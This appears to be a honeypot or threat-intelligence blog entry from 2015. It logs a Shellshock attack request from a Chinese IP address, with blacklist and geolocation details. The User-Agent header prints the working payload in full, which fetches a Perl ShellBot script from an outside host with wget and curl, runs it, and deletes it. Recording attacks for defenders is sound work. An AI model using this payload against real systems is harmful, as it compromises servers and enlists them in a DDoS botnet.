Sunday, 16 August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close

The downloadable Perl script is identified as:
a2.log: Perl.ShellBot-4 FOUND


Blacklist Status: BLACKLISTED 5/40
IP Address: 222.241.151.149
Reverse DNS: Unknown
ASN: AS4134
ASN Owner: Chinanet
ISP: Chinanet Hunan Province Network
Continent: Asia
Country Code: (CN) China
Latitude / Longitude: 28.1792 / 113.114
City: Changsha
Region: Hunan